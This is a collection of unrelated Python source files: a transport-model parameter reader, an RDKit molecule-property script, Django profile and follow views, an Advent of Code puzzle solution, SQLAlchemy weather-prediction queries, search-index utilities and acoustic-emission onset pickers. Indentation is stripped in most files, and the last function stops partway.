except ValueError:
aux_z = z
# print '>> %s'%aux_z
if z < self.nZones:
self.tm_nij[self.list_sectors.index(n),aux_z,:] = param_line[1:self.nZones+1]
z+=1
line+=1
if line==len(lines):
break
sector_line=line+4
line+=9 #space in lines between matrices
filer = open(os.path.join(path,"DISU_T.MTX"), 'r')
lines = filer.readlines()
filer.close()
sector_line=4
line=9
while line<len(lines):
n=int(lines[sector_line][0:4])
z = 0
while True:
param_line = (lines[line][0:4]+lines[line][25:]).split()
if len(param_line)==0:
break
try:
i=int(param_line[0])
aux_z = self.list_zones.index(i)
# print aux_z
except ValueError:
aux_z = z
# print '>> %s'%aux_z
if z < self.nZones:
self.t_nij[self.list_sectors.index(n),aux_z,:] = param_line[1:self.nZones+1]
z+=1
line+=1
if line==len(lines):
break
sector_line=line+4
line+=9 #space in lines between matrices
return
def read_L1E(self,t):
'''read_L1E(t)
Reads the corresponding L1E file located in the workingDirectory.
Stores what is read in local variables of the LCALparam object.
This method is hardcoded, meaning that if the file structure of the
L1E file changes, this method probably needs to be updated as well.
It's not meant to be used externally, it's used when you call the
constructor of the class.
'''
filename=os.path.join(t.workingDirectory,t.scenarioId,t.param_file)
logging.debug("Reading Activity Location Parameters File (L1E), [%s]", filename)
filer = open(filename, 'r')
lines = filer.readlines()
filer.close()
length_lines = len(lines)
""" Section that we are interested in. """
string = "2.1"
""" Getting the section line number within the file. """
for line in range(len(lines)):
# print lines[line][3:6]
if (lines[line][3:6] == string):
break
""" End of section. This is horribly harcoded as we depend
on the format of the Tranus lines files and we don't have any control
over it. Also, this format will probably change in the future, hopefully
to a standarized one.
"""
end_of_section = "*-"
line+=3
# print 'line: %s'%line
while lines[line][0:2] != end_of_section:
# print lines[line]
param_line = line_remove_strings(lines[line].split()) #we remove the strings from each line!
n = self.list_sectors.index(float(param_line[0]))
self.sectors_names.append(lines[line][14:33].rstrip()[0:-1])
self.alfa[n] = param_line[6]
#print param_line
self.beta[n] = param_line[1]
self.lamda[n] = param_line[3]
self.thetaLoc[n] = param_line[5]
line += 1
for i in range(length_lines):
lines[i]=str.split(lines[i])
string = "2.2"
""" Getting the section line number within the file. """
for line in range(len(lines)):
if (lines[line][0] == string):
break
line+=2
while lines[line][0][0:2] != end_of_section:
m,n=self.list_sectors.index(float(lines[line][0])),self.list_sectors.index(float(lines[line][1]))
self.demin[m,n]=lines[line][2]
self.demax[m,n]=lines[line][3]
if self.demax[m,n]==0:
self.demax[m,n]=self.demin[m,n]
self.delta[m,n]=lines[line][4]
line+=1
string = "2.3"
""" Getting the section line number within the file. """
for line in range(len(lines)):
if (lines[line][0] == string):
break
line+=2
n=0
list_sub_sectors=[]
while lines[line][0][0:2] != end_of_section:
if len(lines[line])==5:
n=self.list_sectors.index(float(lines[line][0]))
self.sigma[n] =lines[line][1]
self.thetaSub[n] =lines[line][2]
self.Kn[n,self.list_sectors.index(float(lines[line][3]))]=1
self.omega[n,self.list_sectors.index(float(lines[line][3]))]=lines[line][4]
list_sub_sectors.append(n)
if len(lines[line])==2:
self.Kn[n,self.list_sectors.index(int(lines[line][0]))]=1
self.omega[n,self.list_sectors.index(float(lines[line][0]))]=lines[line][1]
line+=1
self.substitutionSectors = np.array(list_sub_sectors)
string = "3.2"
""" Getting the section line number within the file. """
for line in range(len(lines)):
if (lines[line][0] == string):
break
line+=2
while lines[line][0][0:2] != end_of_section:
m,n=self.list_sectors.index(float(lines[line][0])),self.list_sectors.index(float(lines[line][1]))
self.bkn[m,n]=lines[line][2]
line+=1
return
def normalize(self, t = -1, tm = -1, P = -1):
'''normalize input variables of the utility'''
if t == -1:
t = 10**np.floor(np.log10(self.t_nij.max()))
if tm == -1:
tm = 10**np.floor(np.log10(self.tm_nij.max()))
if P == -1:
P = 10**np.floor(np.log10(self.Price[self.housingSectors,:].max()))
self.t_nij /= t
self.tm_nij /= tm
self.Price /= P
return
def __str__(self):
ex = """See class docstring"""
return ex
if __name__=="__main__":
pass
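# Hedged illustration (not part of the original module) of the scaling used
# by LcalParam.normalize() above: each input block is divided by the largest
# power of ten not exceeding its maximum value. The sample array is made up.
def _example_normalize_scale():
    x = np.array([3.2, 450.0, 87.0])
    scale = 10 ** np.floor(np.log10(x.max()))  # 100.0 for this sample
    return x / scale                           # array([0.032, 4.5, 0.87])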
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
# Distributed under the terms of the MIT License.
"""
Script to populate the properties of all molecules in database.
Author: Andrew Tarzia
Date Created: 05 Sep 2018
"""
from os.path import exists
import sys
import glob
import json
from rdkit.Chem import AllChem as Chem
from rdkit.Chem import Descriptors
from rdkit.Chem.rdMolDescriptors import CalcNumRotatableBonds
from rdkit.Chem.GraphDescriptors import BertzCT
import IO
import rdkit_functions as rdkf
import plots_molecular as pm
import utilities
import chemcost_IO
def populate_all_molecules(
params,
redo_size,
redo_prop,
mol_file=None
):
"""
Populate all molecules in pickle files in directory.
"""
vdwScale = params['vdwScale']
boxMargin = params['boxMargin']
spacing = params['spacing']
show_vdw = params['show_vdw']
plot_ellip = params['plot_ellip']
N_conformers = int(params['N_conformers'])
MW_thresh = params['MW_thresh']
seed = int(params['seed'])
fail_list = IO.fail_list_read(
directory=params['molec_dir'],
file_name='failures.txt'
)
print(mol_file)
if mol_file is None:
molecule_list = glob.glob('*_unopt.mol')
else:
molecule_list = IO.read_molecule_list(mol_file)
print(f'{len(molecule_list)} molecules in DB.')
count = 0
for mol in sorted(molecule_list):
count += 1
name = mol.replace('_unopt.mol', '')
if name in fail_list:
continue
opt_file = name+'_opt.mol'
etkdg_fail = name+'_unopt.ETKDGFAILED'
diam_file = name+'_size.csv'
prop_file = name+'_prop.json'
smiles = rdkf.read_structure_to_smiles(mol)
# Check for generics.
if '*' in smiles:
IO.fail_list_write(
new_name=name,
directory=params['molec_dir'],
file_name='failures.txt'
)
fail_list.append(name)
continue
# Get molecular properties from 2D structure.
if not exists(prop_file) or redo_prop:
print(
f'>> calculating molecule descriptors of {mol}, '
f'{count} of {len(molecule_list)}'
)
prop_dict = {}
rdkitmol = Chem.MolFromSmiles(smiles)
rdkitmol.Compute2DCoords()
Chem.SanitizeMol(rdkitmol)
prop_dict['logP'] = Descriptors.MolLogP(
rdkitmol,
includeHs=True
)
prop_dict['logS'] = rdkf.get_logSw(rdkitmol)
prop_dict['Synth_score'] = rdkf.get_SynthA_score(rdkitmol)
prop_dict['NHA'] = rdkitmol.GetNumHeavyAtoms()
prop_dict['MW'] = Descriptors.MolWt(rdkitmol)
nrb = CalcNumRotatableBonds(rdkitmol)
nb = rdkitmol.GetNumBonds(onlyHeavy=True)
prop_dict['NRB'] = nrb
if nb == 0:
prop_dict['NRBr'] = 0.0
else:
prop_dict['NRBr'] = nrb / nb
prop_dict['bertzCT'] = BertzCT(rdkitmol)
prop_dict['purchasability'] = chemcost_IO.is_purchasable(
name=name,
smiles=smiles
)
with open(prop_file, 'w') as f:
json.dump(prop_dict, f)
# Get a 3D representation of all molecules using ETKDG.
chk1 = (not exists(opt_file) or redo_size)
if chk1 and not exists(etkdg_fail):
print(
f'>> optimising {mol}, '
f'{count} of {len(molecule_list)}'
)
rdkit_mol = rdkf.ETKDG(mol, seed=seed)
if rdkit_mol is not None:
rdkf.write_structure(opt_file, rdkit_mol)
# Only property to determine at the moment is the molecular
# size. This produces a csv for all conformers, which will be
# used in the analysis.
chk2 = (not exists(diam_file) or redo_size)
if chk2 and not exists(etkdg_fail):
print(
f'>> getting molecular size of {mol}, '
f'{count} of {len(molecule_list)}'
)
_ = rdkf.calc_molecule_diameter(
name,
smiles,
out_file=diam_file,
vdwScale=vdwScale,
boxMargin=boxMargin,
spacing=spacing,
MW_thresh=MW_thresh,
show_vdw=show_vdw,
plot_ellip=plot_ellip,
N_conformers=N_conformers,
rSeed=seed
)
del _
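# Hedged sketch (illustration only): a few of the same 2D descriptors that
# populate_all_molecules() writes to each *_prop.json file, computed here for
# a single hard-coded SMILES string (ethanol) so the calls are easy to check
# by hand.
def _example_descriptors(smiles='CCO'):
    rdkitmol = Chem.MolFromSmiles(smiles)
    return {
        'MW': Descriptors.MolWt(rdkitmol),
        'logP': Descriptors.MolLogP(rdkitmol),
        'NHA': rdkitmol.GetNumHeavyAtoms(),
        'NRB': CalcNumRotatableBonds(rdkitmol),
        'bertzCT': BertzCT(rdkitmol),
    }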
def main():
if (not len(sys.argv) == 6):
print("""
Usage: molecule_population.py param_file redo_size redo_prop plot mol_file
param_file:
file of parameters used for this run.
redo_size:
t to overwrite the size of all molecules.
redo_prop:
t to overwrite the properties of all molecules.
plot:
t to plot distributions of molecule properties.
mol_file:
file name of a list of molecules to allow for trivial
parallelisation; `f` if not specified, in which case all `*_unopt.mol`
files are populated.
""")
sys.exit()
else:
params = utilities.read_params(sys.argv[1])
redo_size = sys.argv[2] == 't'
redo_prop = sys.argv[3] == 't'
plot = sys.argv[4] == 't'
mol_file = None if sys.argv[5] == 'f' else sys.argv[5]
print('settings:')
print(' Molecule file:', mol_file)
print(
'populate the properties attributes for all '
'molecules in DB...'
)
populate_all_molecules(
params=params,
mol_file=mol_file,
redo_size=redo_size,
redo_prop=redo_prop,
)
if plot:
pm.mol_parity(
propx='logP',
propy='logS',
file='logPvslogS',
xtitle='logP',
ytitle='logS'
)
pm.mol_parity(
propx='NHA',
propy='Synth_score',
file=f"NHAvsSA_{params['file_suffix']}",
xtitle='no. heavy atoms',
ytitle='SAScore'
)
pm.mol_parity(
propx='NHA',
propy='logP',
file=f"NHAvslogP_{params['file_suffix']}",
xtitle='no. heavy atoms',
ytitle='logP'
)
pm.mol_parity(
propx='NHA',
propy='logS',
file=f"NHAvslogS_{params['file_suffix']}",
xtitle='no. heavy atoms',
ytitle='logS'
)
pm.mol_categ(
propx='purchasability',
propy='Synth_score',
file=f"purchvsSA_{params['file_suffix']}",
xtitle='is purchasable',
ytitle='SAscore'
)
pm.mol_categ(
propx='purchasability',
propy='bertzCT',
file=f"purchvsbCT_{params['file_suffix']}",
xtitle='is purchasable',
ytitle='BertzCT'
)
pm.mol_categ(
propx='purchasability',
propy='size',
file=f"purchvssize_{params['file_suffix']}",
xtitle='is purchasable',
ytitle=r'$d$ [$\mathrm{\AA}$]'
)
pm.mol_categ(
propx='size',
propy='bertzCT',
file=f"sizevsbCT_{params['file_suffix']}",
xtitle='can diffuse',
ytitle='BertzCT'
)
pm.mol_categ(
propx='size',
propy='Synth_score',
file=f"sizevsSA_{params['file_suffix']}",
xtitle='can diffuse',
ytitle='SAscore'
)
pm.mol_all_dist(plot_suffix=params['file_suffix'])
if __name__ == "__main__":
main()
|
from django.shortcuts import render
from rest_framework.generics import ListAPIView, RetrieveUpdateAPIView
from .serializers import (
GetUserProfileSerializer, UpdateProfileSerializer, FavoriteArticleSerializer, FollowSerializer
)
from rest_framework import generics, viewsets
from rest_framework.response import Response
from rest_framework.permissions import IsAuthenticated, IsAuthenticatedOrReadOnly
from rest_framework.views import APIView
from rest_framework import status
from .models import UserProfile, Follow
from authors.apps.authentication.models import User
from rest_framework.exceptions import NotFound
from ..articles.models import Article
class UserProfiles(ListAPIView):
permission_classes = (IsAuthenticated,)
queryset = UserProfile.objects.all()
serializer_class = GetUserProfileSerializer
class Updateprofile(RetrieveUpdateAPIView):
permission_classes = (IsAuthenticated,)
queryset = UserProfile.objects.all()
serializer_class = UpdateProfileSerializer
def update(self, request):
serializer = self.serializer_class(
request.user.userprofile, data=request.data)
serializer.is_valid(raise_exception=True)
serializer.update(request.user.userprofile, request.data)
return Response(serializer.data)
def get(self, request):
serializer = self.serializer_class(request.user.userprofile)
return Response(serializer.data)
class FavoriteArticle(RetrieveUpdateAPIView):
permission_classes = (IsAuthenticatedOrReadOnly,)
serializer_class = FavoriteArticleSerializer
queryset = Article.objects.all()
def update(self, request, slug):
try:
serializer_instance = self.queryset.get(slug=slug)
except Article.DoesNotExist:
return Response('An article with this slug does not exist.', status.HTTP_404_NOT_FOUND)
userprofile_obj = request.user.userprofile
if slug in userprofile_obj.favorite_article:
userprofile_obj.favorite_article.remove(slug)
userprofile_obj.save()
return Response("unfavorited!")
userprofile_obj.favorite_article.append(slug)
userprofile_obj.save(update_fields=['favorite_article'])
return Response("favorited!")
class FollowsView(APIView):
permission_classes = (IsAuthenticated,)
def post(self, request, username):
follower_id = User.objects.get(username=request.user.username).id
try:
followed_id = User.objects.get(username=username).id
self.profile_id = UserProfile.objects.get(user_id=followed_id).id
self.verify_following_criteria_met(
follower_id, followed_id, username)
except Exception as e:
if isinstance(e, User.DoesNotExist):
raise NotFound('No user with name {} exists.'.format(username))
return Response({'error': str(e)}, status=status.HTTP_400_BAD_REQUEST)
follow_data = {'follower': follower_id, 'followed': self.profile_id}
serializer = FollowSerializer(data=follow_data)
serializer.is_valid(raise_exception=True)
serializer.save()
profile = self.get_followed_profile(self.profile_id)
return Response(profile, status=status.HTTP_201_CREATED)
def verify_following_criteria_met(self, follower_id, followed_id, name):
if follower_id == followed_id:
raise Exception('You cannot follow your own profile.')
query_result = Follow.objects.filter(
follower_id=follower_id, followed_id=self.profile_id)
if len(query_result) != 0:
raise Exception('Already following {}.'.format(name))
def get_followed_profile(self, followed):
profile = UserProfile.objects.get(id=followed)
serializer = GetUserProfileSerializer(profile)
profile = serializer.data
profile['following'] = True
return profile
def delete(self, request, username):
user_id = User.objects.get(username=request.user.username).id
try:
followed_id = User.objects.get(username=username).id
profile_id = UserProfile.objects.get(user_id=followed_id).id
follow = Follow.objects.filter(
follower_id=user_id, followed_id=profile_id)
if len(follow) == 0:
raise Exception(
'Cannot unfollow a user you are not following.')
follow.delete()
return Response(
{'message': 'Successfully unfollowed {}.'.format(username)},
status=status.HTTP_204_NO_CONTENT
)
except Exception as e:
if isinstance(e, User.DoesNotExist):
return Response(
{'error': 'No user with name {} exists.'.format(username)},
status=status.HTTP_400_BAD_REQUEST
)
return Response(
{'error': str(e)}, status=status.HTTP_400_BAD_REQUEST
)
def get(self, request, username):
try:
user_id = User.objects.get(username=username).id
except User.DoesNotExist:
raise NotFound('No user with name {} exists.'.format(username))
follows = Follow.objects.filter(follower_id=user_id)
serializer = FollowSerializer(follows, many=True)
following = list()
for follow in serializer.data:
user_id = UserProfile.objects.get(id=follow['followed']).user_id
username = User.objects.get(id=user_id).username
following.append(username)
return Response({'following': following}, status=status.HTTP_200_OK)
class FollowersView(APIView):
permission_classes = (IsAuthenticated,)
def get(self, request, username):
try:
user_id = User.objects.get(username=username).id
except User.DoesNotExist:
raise NotFound('No user with name {} exists.'.format(username))
profile_id = UserProfile.objects.get(user_id=user_id).id
followers = Follow.objects.filter(followed_id=profile_id)
serializer = FollowSerializer(followers, many=True)
followers = list()
for follow in serializer.data:
username = User.objects.get(id=follow['follower']).username
followers.append(username)
return Response({'followers': followers}, status=status.HTTP_200_OK)
|
import copy
import sys
with open('assets/day11.txt', 'r') as file:
lines = [line for line in file.read().splitlines()]
octopuses = {}
for y in range(len(lines)):
for x in range(len(lines[y])):
octopuses[(x, y)] = int(lines[y][x])
def count_flashes(steps: int, break_on_synchronized: bool = False) -> int:
current_octopuses = copy.deepcopy(octopuses)
directions = [(-1, -1), (-1, 0), (-1, 1), (0, -1), (0, 0), (0, 1), (1, -1), (1, 0), (1, 1)]
flashes = 0
for step in range(steps):
for coordinate in current_octopuses.keys():
current_octopuses[coordinate] += 1
flashed = []
while 0 != len([e for c, e in current_octopuses.items() if 9 < e and c not in flashed]):
for coordinate in current_octopuses.keys():
if 9 < current_octopuses[coordinate] and coordinate not in flashed:
neighbors = [tuple(c + d for c, d in zip(coordinate, direction)) for direction in directions]
for neighbor in neighbors:
try:
current_octopuses[neighbor] += 1
except KeyError:
pass
flashed.append(coordinate)
flashes += 1
if break_on_synchronized and len(flashed) == len(current_octopuses):
return step + 1
for coordinate, energy in current_octopuses.items():
if 9 < energy:
current_octopuses[coordinate] = 0
return flashes
print(f"Number of flashes after 100 steps: {count_flashes(100)}")
print(f"Number of flashes after 100 steps: {count_flashes(sys.maxsize, True)}")
|
from .bayescorr import bayesian_correlation
from .best import one_sample_best, two_sample_best
from .bms import bms
from .ttestbf import one_sample_ttestbf, two_sample_ttestbf
|
""" CRUD operations for management of resources
"""
import logging
import datetime
from typing import List
from sqlalchemy import or_
from sqlalchemy.orm import Session
from app.db.models import (
ProcessedModelRunUrl, PredictionModel, PredictionModelRunTimestamp, PredictionModelGridSubset,
ModelRunGridSubsetPrediction)
logger = logging.getLogger(__name__)
LATLON_15X_15 = 'latlon.15x.15'
def get_most_recent_model_run(
session: Session, abbreviation: str, projection: str) -> PredictionModelRunTimestamp:
"""
Get the most recent model run of a specified type (e.g. give me the global
model at 15 km resolution).
params:
:abbreviation: e.g. GDPS or RDPS
:projection: e.g. latlon.15x.15
"""
return session.query(PredictionModelRunTimestamp).\
join(PredictionModel).\
filter(PredictionModel.abbreviation == abbreviation, PredictionModel.projection == projection).\
order_by(PredictionModelRunTimestamp.prediction_run_timestamp.desc()).\
first()
def get_prediction_run(session: Session, prediction_model_id: int,
prediction_run_timestamp: datetime.datetime) -> PredictionModelRunTimestamp:
""" load the model run from the database (.e.g. for 2020 07 07 12h00). """
return session.query(PredictionModelRunTimestamp).\
filter(PredictionModelRunTimestamp.prediction_model_id == prediction_model_id).\
filter(PredictionModelRunTimestamp.prediction_run_timestamp ==
prediction_run_timestamp).first()
def create_prediction_run(session: Session, prediction_model_id: int,
prediction_run_timestamp: datetime.datetime) -> PredictionModelRunTimestamp:
""" Create a model prediction run for a particular model.
"""
prediction_run = PredictionModelRunTimestamp(
prediction_model_id=prediction_model_id, prediction_run_timestamp=prediction_run_timestamp)
session.add(prediction_run)
session.commit()
return prediction_run
def get_or_create_prediction_run(session, prediction_model: PredictionModel,
prediction_run_timestamp: datetime.datetime) -> PredictionModelRunTimestamp:
""" Get a model prediction run for a particular model, creating one if it doesn't already exist.
"""
prediction_run = get_prediction_run(
session, prediction_model.id, prediction_run_timestamp)
if not prediction_run:
logger.info('Creating prediction run %s for %s',
prediction_model.abbreviation, prediction_run_timestamp)
prediction_run = create_prediction_run(
session, prediction_model.id, prediction_run_timestamp)
return prediction_run
def _construct_grid_filter(coordinates):
# Run through each coordinate, adding it to the "or" construct.
geom_or = None
for coordinate in coordinates:
condition = PredictionModelGridSubset.geom.ST_Contains(
'POINT({longitude} {latitude})'.format(longitude=coordinate[0], latitude=coordinate[1]))
if geom_or is None:
geom_or = or_(condition)
else:
geom_or = or_(condition, geom_or)
return geom_or
def get_model_run_predictions(
session: Session,
prediction_run: PredictionModelRunTimestamp,
coordinates) -> List:
"""
Get the predictions for a particular model run, for a specified geographical coordinate.
Returns a PredictionModelGridSubset with joined Prediction and PredictionValueType."""
# condition for query: are coordinates within the saved grids
geom_or = _construct_grid_filter(coordinates)
# We are only interested in predictions from now onwards
now = datetime.datetime.now(tz=datetime.timezone.utc)
# Build up the query:
query = session.query(PredictionModelGridSubset, ModelRunGridSubsetPrediction).\
filter(geom_or).\
filter(ModelRunGridSubsetPrediction.prediction_model_run_timestamp_id == prediction_run.id).\
filter(ModelRunGridSubsetPrediction.prediction_model_grid_subset_id == PredictionModelGridSubset.id).\
filter(ModelRunGridSubsetPrediction.prediction_timestamp >= now).\
order_by(PredictionModelGridSubset.id,
ModelRunGridSubsetPrediction.prediction_timestamp.asc())
return query
def get_predictions_from_coordinates(session: Session, coordinates: List, model: str) -> List:
""" Get the predictions for a particular model, at a specified geographical coordinate. """
# condition for query: are coordinates within the saved grids
geom_or = _construct_grid_filter(coordinates)
# We are only interested in the last 5 days.
now = datetime.datetime.now(tz=datetime.timezone.utc)
back_5_days = now - datetime.timedelta(days=5)
# Build the query:
query = session.query(PredictionModelGridSubset, ModelRunGridSubsetPrediction, PredictionModel).\
filter(geom_or).\
filter(ModelRunGridSubsetPrediction.prediction_timestamp >= back_5_days,
ModelRunGridSubsetPrediction.prediction_timestamp <= now).\
filter(PredictionModelGridSubset.id ==
ModelRunGridSubsetPrediction.prediction_model_grid_subset_id).\
filter(PredictionModelGridSubset.prediction_model_id == PredictionModel.id,
PredictionModel.abbreviation == model).\
order_by(PredictionModelGridSubset.id,
ModelRunGridSubsetPrediction.prediction_timestamp.asc())
return query
def get_or_create_grid_subset(session: Session,
prediction_model: PredictionModel,
geographic_points) -> PredictionModelGridSubset:
""" Get the subset of grid points of interest. """
geom = 'POLYGON(({} {}, {} {}, {} {}, {} {}, {} {}))'.format(
geographic_points[0][0], geographic_points[0][1],
geographic_points[1][0], geographic_points[1][1],
geographic_points[2][0], geographic_points[2][1],
geographic_points[3][0], geographic_points[3][1],
geographic_points[0][0], geographic_points[0][1])
grid_subset = session.query(PredictionModelGridSubset).\
filter(PredictionModelGridSubset.prediction_model_id == prediction_model.id).\
filter(PredictionModelGridSubset.geom == geom).first()
if not grid_subset:
logger.info('creating grid subset %s', geographic_points)
grid_subset = PredictionModelGridSubset(
prediction_model_id=prediction_model.id, geom=geom)
session.add(grid_subset)
session.commit()
return grid_subset
def get_processed_file_record(session: Session, url: str) -> ProcessedModelRunUrl:
""" Get record corresponding to a processed file. """
processed_file = session.query(ProcessedModelRunUrl).\
filter(ProcessedModelRunUrl.url == url).first()
return processed_file
def get_prediction_model(session: Session, abbreviation: str, projection: str) -> PredictionModel:
""" Get the prediction model corresponding to a particular abbreviation and projection. """
return session.query(PredictionModel).\
filter(PredictionModel.abbreviation == abbreviation).\
filter(PredictionModel.projection == projection).first()
|
import json
import os
import time
from tqdm import tqdm
from easydict import EasyDict
import pandas as pd
from .index_compression import restore_dict
def find_pos_in_str(zi, mu):
len1 = len(zi)
pl = []
    for each in range(len(mu) - len1 + 1):  # +1 so a match ending on the final character is also found
        if mu[each:each + len1] == zi:  # record every position where the substring matches
pl.append(each)
return pl
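# Illustrative example: with the inclusive upper bound above,
# find_pos_in_str("ab", "abcab") returns [0, 3], i.e. every offset at which
# the substring occurs, including a match that ends on the final character.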
def insert_term2dict(term, _dict, doc_id, pos_id):
if term != "":
if term not in _dict.keys():
_dict[term] = dict()
_dict[term]['doc_feq'] = 1
_dict[term]['posting_list'] = dict() # This is for future modification
_dict[term]['posting_list'][doc_id] = [pos_id]
else:
if doc_id not in _dict[term]['posting_list'].keys():
_dict[term]['doc_feq'] += 1
_dict[term]['posting_list'][doc_id] = [pos_id]
else:
_dict[term]['posting_list'][doc_id].append(pos_id)
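# Hedged usage sketch (the helper name and toy documents are illustrative,
# not part of the original module): build a tiny in-memory inverted index
# with insert_term2dict and show the resulting structure for one term.
def _demo_insert_term2dict():
    index = dict()
    for doc_id, text in enumerate(["to be or not to be", "to do"]):
        for pos_id, term in enumerate(text.split(" ")):
            insert_term2dict(term, index, doc_id, pos_id)
    # index["to"] == {'doc_feq': 2, 'posting_list': {0: [0, 4], 1: [0]}}
    return index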
def write_term_dict2disk(term_dict, filename):
print("\tI'm writing {} to disk...".format(filename))
start = time.time()
term_dict = dict(sorted(term_dict.items(), key=lambda x: x[0]))
term_col = list(term_dict.keys())
doc_feq_col = list()
posting_list_col = list()
for term in tqdm(term_dict.keys()):
doc_feq_col.append(term_dict[term]['doc_feq'])
posting_list = dict(sorted(term_dict[term]['posting_list'].items(), key=lambda x: x[0]))
term_dict[term]['posting_list'] = posting_list
posting_list_col.append(posting_list)
data_frame = pd.DataFrame({'term': term_col, 'doc_feq': doc_feq_col, 'posting_list': posting_list_col})
data_frame.to_csv(filename, index=False, sep=',')
end = time.time()
print("\tFile {} has been successfully wrote to disk in {:.4f} seconds.".format(filename, end - start))
return term_dict
def get_engine_from_csv(file_path, name, mode="vb"):
filename = name + ".csv"
file_name = os.path.join(file_path, name + ".csv")
if filename not in os.listdir(file_path):
raise NameError("No such file : {}.".format(file_name))
print("\tI'm Loading the {} from {}...".format(name, file_name))
start = time.time()
dict_map = dict()
if "compressed" in name:
end = time.time()
print("\tSuccessfully load {} in {:.4f} seconds.".format(name, end - start))
return restore_dict(file_name, mode)
if "dict" in name and "vector_model" not in name and "spell" not in name:
df = pd.read_csv(file_name)
for i, term in enumerate(df['term']):
term = str(term)
dict_map[term] = dict()
dict_map[term]['doc_feq'] = df['doc_feq'][i]
dict_map[term]['posting_list'] = eval(df['posting_list'][i])
if "vector_model" in name:
df = pd.read_csv(file_name)
for i, doc_id in enumerate(df['doc_id']):
dict_map[doc_id] = eval(df['values'][i])
if "spell" in name or "rotation" in name:
df = pd.read_csv(file_name)
for i, key in enumerate(df['key']):
key = str(key)
dict_map[key] = eval(df['value'][i])
end = time.time()
print("\tSuccessfully load {} in {:.4f} seconds.".format(name, end - start))
return dict_map
def parsing_json(file_path):
args_dict = json.load(open(file_path, "rb"))
args = EasyDict()
for key, value in args_dict.items():
args[key] = value
return args
def get_doc_name_from_doc_id(data_path, doc_id):
filenames = os.listdir(data_path)
filenames = sorted(filenames, key=lambda x: int(x.split(".")[0]))
return filenames[doc_id]
def display_query_result(data_path, term, pos):
"""
:param data_path:
:param term:
:param pos:
:return:
"""
filenames = os.listdir(data_path)
filenames = sorted(filenames, key=lambda x: int(x.split(".")[0]))
for doc_id, pos_list in pos.items():
doc_name = filenames[doc_id]
print("{}: {}".format(doc_name, term))
def display_query_result_detailed(data_path, term, pos, k=10):
"""
:param data_path:
:param term:
:param pos:
:param k: Display k words before and after the sentence
:return:
"""
filenames = os.listdir(data_path)
filenames = sorted(filenames, key=lambda x: int(x.split(".")[0]))
for doc_id, pos_list in pos.items():
doc_name = filenames[doc_id]
print("{}: {}".format(doc_name, term))
print("----------------------------------------------------------")
with open(os.path.join(data_path, doc_name), "r") as file:
content = file.read()
raw_term_list = content.split(" ")
for pos_id in pos[doc_id]:
display_content = " ".join(raw_term_list[pos_id - k:pos_id + k + 1])
print(display_content)
file.close()
|
import math
from typing import Tuple
import numpy as np
from numba import njit
@njit
def hinkley(arr: np.ndarray, alpha: int = 5) -> Tuple[np.ndarray, int]:
"""
Hinkley criterion for arrival time estimation.
The Hinkley criterion is defined as the partial energy of the signal
(cumulative square sum) with an applied negative trend (characterized by alpha).
The starting value of alpha is reduced iteratively to avoid wrong picks within the
pre-trigger part of the signal.
Usually alpha values are chosen to be between 2 and 200 to ensure minimal delay.
The chosen alpha value for the Hinkley criterion influences the results significantly.
Args:
arr: Transient signal of hit
alpha: Divisor of the negative trend. Default: 5
Returns:
- Array with computed detection function
        - Index of the estimated arrival time (min value)
Todo:
Weak performance, if used with default parameter alpha
References:
- Molenda, M. (2016). Acoustic Emission monitoring of
laboratory hydraulic fracturing experiments. Ruhr-Universität Bochum.
- van Rijn, N. (2017).
Investigating the Behaviour of Acoustic Emission Waves Near Cracks:
Using the Finite Element Method. Delft University of Technology.
"""
n = len(arr)
result = np.zeros(n, dtype=np.float32)
total_energy = 0.0
for i in range(n):
total_energy += arr[i] ** 2
negative_trend = total_energy / (alpha * n)
min_value = math.inf
min_index = 0
partial_energy = 0.0
for i in range(n):
partial_energy += arr[i] ** 2
result[i] = partial_energy - (i * negative_trend)
if result[i] < min_value:
min_value = result[i]
min_index = i
return result, min_index
@njit
def aic(arr: np.ndarray) -> Tuple[np.ndarray, int]:
"""
Akaike Information Criterion (AIC) for arrival time estimation.
The AIC picker basically models the signal as an autoregressive (AR) process.
A typical AE signal can be subdivided into two parts.
The first part containing noise and the second part containing noise and the AE signal.
    Both parts of the signal contain non-deterministic parts (noise) describable by a
Gaussian distribution.
Args:
arr: Transient signal of hit
Returns:
- Array with computed detection function
        - Index of the estimated arrival time (min value)
References:
- Molenda, M. (2016). Acoustic Emission monitoring
of laboratory hydraulic fracturing experiments.
Ruhr-Universität Bochum.
- Bai, F., Gagar, D., Foote, P., & Zhao, Y. (2017).
Comparison of alternatives to amplitude thresholding for onset detection
of acoustic emission signals.
Mechanical Systems and Signal Processing, 84, 717–730.
- van Rijn, N. (2017).
Investigating the Behaviour of Acoustic Emission Waves Near Cracks:
Using the Finite Element Method. Delft University of Technology.
"""
n = len(arr)
result = np.full(n, np.nan, dtype=np.float32)
safety_eps = np.finfo(np.float32).tiny # pylint: disable=E1101
min_value = math.inf
min_index = 0
l_sum = 0.0
r_sum = 0.0
l_squaresum = 0.0
r_squaresum = 0.0
for i in range(n):
r_sum += arr[i]
r_squaresum += arr[i] ** 2
for i in range(n - 1):
l_sum += arr[i]
l_squaresum += arr[i] ** 2
r_sum -= arr[i]
r_squaresum -= arr[i] ** 2
l_len = i + 1
r_len = n - i - 1
l_variance = (1 / l_len) * l_squaresum - ((1 / l_len) * l_sum) ** 2
r_variance = (1 / r_len) * r_squaresum - ((1 / r_len) * r_sum) ** 2
# catch negative and very small values < safety_eps
l_variance = max(l_variance, safety_eps)
r_variance = max(r_variance, safety_eps)
result[i] = (
(i + 1) * math.log(l_variance) / math.log(10) +
(n - i - 2) * math.log(r_variance) / math.log(10)
)
if result[i] < min_value:
min_value = result[i]
min_index = i
return result, min_index
@njit
def energy_ratio(arr: np.ndarray, win_len: int = 100) -> Tuple[np.ndarray, int]:
"""
Energy ratio for arrival time estimation.
Method based on preceding and following energy collection windows.
Args:
arr: Transient signal of hit
win_len: Samples of sliding windows. Default: 100
Returns:
- Array with computed detection function
- Index of the estimated arrival time (max value)
References:
- Han, L., Wong, J., & Bancroft, J. C. (2009).
Time picking and random noise reduction on microseismic data.
CREWES Research Report, 21, 1–13.
"""
n = len(arr)
result = np.zeros(n, dtype=np.float32)
safety_eps = np.finfo(np.float32).tiny # pylint: disable=E1101
max_value = -math.inf
max_index = 0
l_squaresum = 0.0
r_squaresum = 0.0
for i in range(0, win_len):
l_squaresum += arr[i] ** 2
for i in range(win_len, win_len + win_len):
r_squaresum += arr[i] ** 2
for i in range(win_len, n - win_len):
l_squaresum += arr[i] ** 2
r_squaresum += arr[i + win_len] ** 2
l_squaresum -= arr[i - win_len] ** 2
